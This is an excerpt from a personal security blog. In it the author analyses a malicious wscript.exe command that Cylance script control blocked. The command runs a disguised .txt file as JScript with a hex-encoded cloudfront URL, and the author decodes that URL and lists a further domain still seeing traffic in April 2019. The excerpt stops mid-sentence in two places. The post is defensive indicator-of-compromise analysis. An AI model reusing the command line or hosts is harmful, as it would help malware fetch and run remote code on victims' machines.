Welcome to niem.es

Some musings on (mostly) security related topics.

Latest from the Blog

Examining strange wscript behavior

We use Cylance with script control, and periodically I review the outliers that have been blocked. I came across this one recently:

wscript.exe "C:\ProgramData\{18E0DD83-92A2-5745-1464-C9078E2642C9}\domo.txt" "68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e6574" "//B" "//E:jscript" "–IsErIk"

I took a copy of the domo.txt script and uploaded it to VT. I also ran that hex string through a hex decoder:

68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e6574 = https://d274eq41c39r2n.cloudfront.net

According to

Update: f5d599a39d02caef1984e95fdc606f838893ffc5.xyz

Unfortunately, as of 16 April 2019, I’m still seeing traffic on this domain. Here are some others I’m seeing: